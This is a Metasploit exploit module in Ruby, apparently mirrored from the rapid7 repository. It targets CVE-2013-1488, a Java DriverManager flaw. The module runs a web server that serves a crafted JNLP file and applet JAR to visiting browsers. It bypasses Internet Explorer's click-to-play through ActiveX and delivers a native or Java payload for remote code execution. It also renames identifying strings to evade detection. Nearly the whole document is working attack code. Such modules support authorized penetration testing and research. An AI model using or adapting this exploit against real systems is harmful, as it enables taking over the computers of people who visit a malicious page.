Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/java_jre17_driver_manager.rb
19511 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::HttpServer::HTML
10
include Msf::Exploit::EXE
11
12
# include Msf::Exploit::Remote::BrowserAutopwn
13
# autopwn_info({ :javascript => false })
14
15
def initialize(info = {})
16
super(
17
update_info(
18
info,
19
'Name' => 'Java Applet Driver Manager Privileged toString() Remote Code Execution',
20
'Description' => %q{
21
This module abuses the java.sql.DriverManager class where the toString() method
22
is called over user supplied classes from a doPrivileged block. The vulnerability
23
affects Java version 7u17 and earlier. This exploit bypasses click-to-play on Internet Explorer
24
and throws a specially crafted JNLP file. This bypass is applicable mainly to IE, where Java
25
Web Start can be launched automatically through the ActiveX control. Otherwise, the
26
applet is launched without click-to-play bypass.
27
},
28
'License' => MSF_LICENSE,
29
'Author' => [
30
'James Forshaw', # Vulnerability discovery and Analysis
31
'juan vazquez' # Metasploit module
32
],
33
'References' => [
34
[ 'CVE', '2013-1488' ],
35
[ 'OSVDB', '91472' ],
36
[ 'BID', '58504' ],
37
[ 'URL', 'http://www.contextis.com/research/blog/java-pwn2own/' ],
38
[ 'URL', 'http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html' ],
39
[ 'ZDI', '13-076' ]
40
],
41
'Platform' => %w{java linux osx win},
42
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
43
'Targets' => [
44
[
45
'Generic (Java Payload)',
46
{
47
'Platform' => ['java'],
48
'Arch' => ARCH_JAVA,
49
}
50
],
51
[
52
'Windows x86 (Native Payload)',
53
{
54
'Platform' => 'win',
55
'Arch' => ARCH_X86,
56
}
57
],
58
[
59
'Mac OS X x86 (Native Payload)',
60
{
61
'Platform' => 'osx',
62
'Arch' => ARCH_X86,
63
}
64
],
65
[
66
'Linux x86 (Native Payload)',
67
{
68
'Platform' => 'linux',
69
'Arch' => ARCH_X86,
70
}
71
],
72
],
73
'DefaultTarget' => 0,
74
'DisclosureDate' => '2013-01-10',
75
'Notes' => {
76
'Reliability' => UNKNOWN_RELIABILITY,
77
'Stability' => UNKNOWN_STABILITY,
78
'SideEffects' => UNKNOWN_SIDE_EFFECTS
79
}
80
)
81
)
82
end
83
84
def setup
85
path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1488", "Exploit.class")
86
@exploit_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
87
path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1488", "FakeDriver.class")
88
@driver_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
89
path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1488", "FakeDriver2.class")
90
@driver2_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
91
path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1488", "META-INF", "services", "java.lang.Object")
92
@object_services = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
93
path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1488", "META-INF", "services", "java.sql.Driver")
94
@driver_services = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
95
96
@exploit_class_name = rand_text_alpha("Exploit".length)
97
@exploit_class.gsub!("Exploit", @exploit_class_name)
98
99
@jnlp_name = rand_text_alpha(8)
100
101
super
102
end
103
104
def jnlp_file
105
jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"
106
107
jnlp = %Q|
108
<?xml version="1.0" encoding="utf-8"?>
109
<jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{jnlp_uri}">
110
<information>
111
<title>Applet Test JNLP</title>
112
<vendor>#{rand_text_alpha(8)}</vendor>
113
<description>#{rand_text_alpha(8)}</description>
114
<offline-allowed/>
115
</information>
116
117
<resources>
118
<j2se version="1.7+" href="http://java.sun.com/products/autodl/j2se" />
119
<jar href="#{rand_text_alpha(8)}.jar" main="true" />
120
</resources>
121
<applet-desc name="#{rand_text_alpha(8)}" main-class="#{@exploit_class_name}" width="1" height="1">
122
<param name="__applet_ssv_validated" value="true"></param>
123
</applet-desc>
124
<update check="background"/>
125
</jnlp>
126
|
127
return jnlp
128
end
129
130
def on_request_uri(cli, request)
131
print_status("handling request for #{request.uri}")
132
133
case request.uri
134
when /\.jnlp$/i
135
send_response(cli, jnlp_file, { 'Content-Type' => "application/x-java-jnlp-file" })
136
when /\.jar$/i
137
jar = payload.encoded_jar
138
jar.add_file("#{@exploit_class_name}.class", @exploit_class)
139
jar.add_file("FakeDriver.class", @driver_class)
140
jar.add_file("FakeDriver2.class", @driver2_class)
141
jar.add_file("META-INF/services/java.lang.Object", @object_services)
142
jar.add_file("META-INF/services/java.sql.Driver", @driver_services)
143
metasploit_str = rand_text_alpha("metasploit".length)
144
payload_str = rand_text_alpha("payload".length)
145
jar.entries.each { |entry|
146
entry.name.gsub!("metasploit", metasploit_str)
147
entry.name.gsub!("Payload", payload_str)
148
entry.data = entry.data.gsub("metasploit", metasploit_str)
149
entry.data = entry.data.gsub("Payload", payload_str)
150
}
151
jar.build_manifest
152
153
send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
154
when /\/$/
155
payload = regenerate_payload(cli)
156
if not payload
157
print_error("Failed to generate the payload.")
158
send_not_found(cli)
159
return
160
end
161
send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
162
else
163
send_redirect(cli, get_resource() + '/', '')
164
end
165
end
166
167
def generate_html
168
jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"
169
170
# When the browser is IE, the ActvX is used in order to load the malicious JNLP, allowing click2play bypass
171
# Else an <applet> tag is used to load the malicious applet, this time there isn't click2play bypass
172
html = %Q|
173
<html>
174
<body>
175
<object codebase="http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0" classid="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" height=0 width=0>
176
<param name="app" value="#{jnlp_uri}">
177
<param name="back" value="true">
178
<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
179
</object>
180
</body>
181
</html>
182
|
183
return html
184
end
185
end
186
187